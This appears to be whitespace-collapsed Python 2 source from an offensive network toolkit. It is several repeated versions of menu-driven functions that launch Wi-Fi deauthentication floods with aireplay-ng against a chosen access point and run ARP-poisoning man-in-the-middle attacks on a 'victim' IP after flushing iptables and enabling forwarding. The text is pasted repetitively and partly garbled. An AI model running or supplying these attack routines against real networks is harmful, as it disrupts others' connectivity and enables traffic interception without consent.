def ddos(run): global defaultcar,defaultint,defaultmac,defaultcha,defaultess try: if run!=1: actions=raw_input(d.prompt("wifi/dos")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("intf","yes","Interface card",defaultcar) d.descrip("intm","yes","Int... monitor",defaultint) d.descrip("bssid","yes","Mac address",defaultmac) d.descrip("essid","yes","Name of AP",defaultess) d.descrip("chan","yes","Channel red",defaultcha) d.helpAUX() ping.interfaces(1) ping.monitor() d.space() elif actions[0:8] == "set intf": defaultcar=ping.update(defaultcar,actions,"intf") d.change("intf",defaultcar) elif actions[0:8] == "set intm": defaultint=ping.update(defaultint,actions,"intm") d.change("intm",defaultint) elif actions[0:9] == "set bssid": defaultmac=ping.update(defaultmac,actions,"bssid") d.change("bssid",defaultmac) elif actions[0:9] == "set essid": defaultess=ping.update(defaultess,actions,"essid") d.change("essid",defaultess) elif actions[0:8] == "set chan": defaultcha=ping.update(defaultcha,actions,"chan") d.change("chan",defaultcha) elif actions[0:5] == "start": start = actions[6:] print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("airmon-ng start "+start,"\t\t\t") elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": d.run() try: print " "+Alr+" Starting attack..." subprocess.call('aireplay-ng --deauth 1000 -a '+defaultmac+' '+defaultint, shell=True) except(KeyboardInterrupt, SystemExit): print("\n "+Alr+" Stopped DDOS") else: d.nocommand() except: d.kbi() exit() ddos(0)
def iandi(): d.run() d.space() print " IP Local : ",ping.myip() ping.interfaces(1) ping.get_gateway(1) ping.my_mac_address(1) ping.get_external_ip() print " Username : "******" OS : ",commands.getoutput('uname') print " Version : ",commands.getoutput('uname -r') return 1
def ddos(run): global defaultint, defaultmac try: if run != 1: actions = raw_input(d.prompt("wifi/dos")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("device", "yes", "Interface", defaultint) d.descrip("bssid", "yes", "Mac Target", defaultmac) d.helpAUX() ping.interfaces(1) ping.monitor() d.space() elif actions[0:10] == "set device": defaultint = ping.update(defaultint, actions, "device") d.change("device", defaultint) ddos(0) elif actions[0:9] == "set bssid": defaultmac = ping.update(defaultmac, actions, "bssid") d.change("bssid", defaultmac) elif actions[0:5] == "start": start = actions[6:] print " " + Alr + " Starting Monitor Mode In " + start, ping.status_cmd( "sudo airmon-ng start " + start, "\t\t\t") elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: if ping.checkDevice(defaultint): print " " + Alr + " Starting attack to " + defaultmac subprocess.call('aireplay-ng --deauth 100000 -a ' + defaultmac + ' ' + defaultint, shell=True) stopAttack = raw_input( ' ' + Hlp + ' Press Any Key for Stop the Attack.') subprocess.call("killall aireplay-ng", shell=True) else: d.NoDeviceFound(defaultint) except: Errors.Errors(event=sys.exc_info(), info=3) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=1) ddos(0)
def iandi(): d.run() d.space() print " IP Local : ", ping.myip() ping.interfaces(1) ping.get_gateway(1) ping.my_mac_address(1) ping.get_external_ip() print " Username : "******" OS : ", commands.getoutput('uname') print " Version : ", commands.getoutput('uname -r') return 1
def ddos(run): global defaultint,defaultmac,defaulchan try: if run!=1: actions=raw_input(d.prompt("wifi/dos")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("device","yes","Interface",defaultint) d.descrip("bssid","yes","Mac Target",defaultmac) d.descrip("chann","yes","Channel ap",defaultmac) d.helpAUX() ping.interfaces(1) ping.monitor() d.space() elif actions[0:10] == "set device": defaultint=ping.update(defaultint,actions,"device") d.change("device",defaultint) ddos(0) elif actions[0:9] == "set bssid": defaultmac=ping.update(defaultmac,actions,"bssid") d.change("bssid",defaultmac) elif actions[0:5] == "start": start = actions[6:] print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("sudo airmon-ng start "+start,"\t\t\t") elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": d.run() try: if ping.checkDevice(defaultint): print " "+Alr+" Starting attack to "+defaultmac ping.Subprocess('aireplay-ng --deauth 100000 -a '+defaultmac+' '+defaultint) NULL=raw_input(" "+Hlp+" for Stop DOS Attack (PRESS ANY KEY)") subprocess.call("killall aireplay-ng", shell=True) else: d.NoDeviceFound(defaultint) except: Errors.Errors(event=sys.exc_info(), info=3) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=1) ddos(0)
def arpp(run): try: global defaultgat,defaultipv,defaultint if run!=1: actions=raw_input(d.prompt("net/arpspoof")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP victim",defaultipv) d.descrip("gway","yes","Gateway-Router.",defaultgat) d.descrip("iterce","yes","Interface",defaultint) d.helpAUX() if ping.conneted()!=False: ping.interfaces(1) ping.get_gateway(1) ping.my_mac_address(1) d.space() if ping.conneted()!=False: commands.getoutput(NMAP_PATH+' -sn '+str(ping.myip())+'/24 -oX tmp/ips.xml > null') GateWay=ping.get_gateway(2) tree = ET.parse('tmp/ips.xml') root = tree.getroot() IPf=0 counter=0 IP="" for host in root.findall('host'): for hosted in host.findall('address'): if hosted.get('addrtype') == "ipv4": IPf=hosted.get('addr') else: if GateWay == IPf : IPf=colors[8]+colors[4]+"{GW:"+IPf+"}"+colors[0] IPs.append(" "+IPf+" "+str(hosted.get('addr'))+" "+str(hosted.get('vendor'))) print " "+colors[10]+colors[7]+" # \t IP \t\t MAC \t\t VENDOR "+colors[0] for HOST in IPs: counter=counter+1 print " ["+str(counter)+"]"+HOST d.space() commands.getoutput('rm tmp/ips.xml > null') else: print d.noconnect() print "" arpp(0) elif actions[0:10] == "set target": defaultipv=ping.update(defaultipv,actions,"target") d.change("target",defaultipv) elif actions[0:8] == "set gway": defaultgat=ping.update(defaultgat,actions,"gway") d.change("gway",defaultgat) elif actions[0:10] == "set iterce": defaultint=ping.update(defaultint,actions,"iterce") d.change("iterce",defaultint) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions[0:5]=="save:": ping.SaveVariable(secuence=actions, matrix=IPs) elif actions=="run" or actions=="r": d.run() try: My_Ip=ping.myip() Tables=""" iptables --flush; iptables --zero; iptables --delete-chain; iptables -F -t nat; iptables --append FORWARD --in-interface """+defaultint+""" --jump ACCEPT; iptables --table nat --append POSTROUTING --out-interface """+defaultint+"""; """ print " "+Alr+" Ensure the victim recieves packets by forwarding them",ping.status_cmd('echo 1 > /proc/sys/net/ipv4/ip_forward','\t') print " "+Alr+" Configuring IPtables NAT",ping.status_cmd(Tables,'\t\t\t\t') print " "+Alr+" Starting ARP Poisoning..." try: z=multiprocessing.Process(target=Get_PoisoningTTG) t=multiprocessing.Process(target=Get_PoisoningTGT) t.start() z.start() NULL=raw_input(" "+Hlp+" Stop Attack ARP (PRESS ANY KEY)") print " "+Alr+" Stopping ARP Poisoning...", ping.status_cmd('killall arpspoof','\t\t\t\t') print " "+Alr+" Setting Normal configuration in forwarding",ping.status_cmd('echo 0 > /proc/sys/net/ipv4/ip_forward','\t\t') t.terminate() z.terminate() d.space() arpp(0) except: Errors.Errors(event=sys.exc_info(), info=False) except: Errors.Errors(event=sys.exc_info(), info=False) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=False) arpp(0)
def arpp(run): try: global defaultgat, defaultipv, defaultint if run != 1: actions = raw_input(d.prompt("net/arpspoof")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP victim", defaultipv) d.descrip("gway", "yes", "Gateway-Router.", defaultgat) d.descrip("iterce", "yes", "Interface", defaultint) d.helpAUX() if ping.conneted() != False: ping.interfaces(1) ping.get_gateway(1) ping.my_mac_address(1) d.space() if ping.conneted() != False: commands.getoutput(NMAP_PATH + ' -sn ' + str(ping.myip()) + '/24 -oX tmp/ips.xml > null') GateWay = ping.get_gateway(2) tree = ET.parse('tmp/ips.xml') root = tree.getroot() IPf = 0 counter = 0 IP = "" for host in root.findall('host'): for hosted in host.findall('address'): if hosted.get('addrtype') == "ipv4": IPf = hosted.get('addr') else: if GateWay == IPf: IPf = colors[8] + colors[ 4] + "{GW:" + IPf + "}" + colors[0] IPs.append(" " + IPf + " " + str(hosted.get('addr')) + " " + str(hosted.get('vendor'))) print " " + colors[10] + colors[ 7] + " # \t IP \t\t MAC \t\t VENDOR " + colors[ 0] for HOST in IPs: counter = counter + 1 print " [" + str(counter) + "]" + HOST d.space() commands.getoutput('rm tmp/ips.xml > null') else: print d.noconnect() print "" arpp(0) elif actions[0:10] == "set target": defaultipv = ping.update(defaultipv, actions, "target") d.change("target", defaultipv) elif actions[0:8] == "set gway": defaultgat = ping.update(defaultgat, actions, "gway") d.change("gway", defaultgat) elif actions[0:10] == "set iterce": defaultint = ping.update(defaultint, actions, "iterce") d.change("iterce", defaultint) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions[0:5] == "save:": ping.SaveVariable(secuence=actions, matrix=IPs) elif actions == "run" or actions == "r": d.run() try: My_Ip = ping.myip() Tables = """ iptables --flush; iptables --zero; iptables --delete-chain; iptables -F -t nat; iptables --append FORWARD --in-interface """ + defaultint + """ --jump ACCEPT; iptables --table nat --append POSTROUTING --out-interface """ + defaultint + """; """ print " " + Alr + " Ensure the victim recieves packets by forwarding them", ping.status_cmd( 'echo 1 > /proc/sys/net/ipv4/ip_forward', '\t') print " " + Alr + " Configuring IPtables NAT", ping.status_cmd( Tables, '\t\t\t\t') print " " + Alr + " Starting ARP Poisoning..." try: z = multiprocessing.Process(target=Get_PoisoningTTG) t = multiprocessing.Process(target=Get_PoisoningTGT) t.start() z.start() NULL = raw_input(" " + Hlp + " Stop Attack ARP (PRESS ANY KEY)") print " " + Alr + " Stopping ARP Poisoning...", ping.status_cmd( 'killall arpspoof', '\t\t\t\t') print " " + Alr + " Setting Normal configuration in forwarding", ping.status_cmd( 'echo 0 > /proc/sys/net/ipv4/ip_forward', '\t\t') t.terminate() z.terminate() d.space() arpp(0) except: Errors.Errors(event=sys.exc_info(), info=False) except: Errors.Errors(event=sys.exc_info(), info=False) else: d.No_actions() except: Errors.Errors(event=sys.exc_info(), info=False) arpp(0)
def arpp(run): try: global defaultgat,defaultipv,defaultint if run!=1: actions=raw_input(d.prompt("net/arpspoof")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP victim",defaultipv) d.descrip("gway","yes","Gateway-Router.",defaultgat) d.descrip("inter","yes","Interface",defaultint) d.helpAUX() if ping.conneted()!=False: ping.interfaces(1) ping.get_gateway(1) ping.my_mac_address(1) d.space() ping.lan_ips(1) else: print d.noconnect() print "" arpp(0) elif actions[0:10] == "set target": defaultipv = actions[11:] d.change("target",defaultipv) arpp(0) elif actions[0:8] == "set gway": defaultgat = actions[9:] d.change("gway",defaultgat) arpp(0) elif actions[0:10] == "set inter": defaultint = actions[11:] d.change("inter",defaultint) arpp(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: print " "+Alr+" Ensure the victim recieves packets by forwarding them",ping.status_cmd('echo 1 > /proc/sys/net/ipv4/ip_forward','\t') print " "+Alr+" Starting ARP Poisoning..." try: os.system("arpspoof -i "+defaultint+" -t "+defaultipv+" -r "+defaultgat) except: print " "+Alr+" Stopping ARP Poisoning..." print " "+Alr+" forwarding in 0",ping.status_cmd('echo 0 > /proc/sys/net/ipv4/ip_forward','\t\t\t') Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=False) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) arpp(0)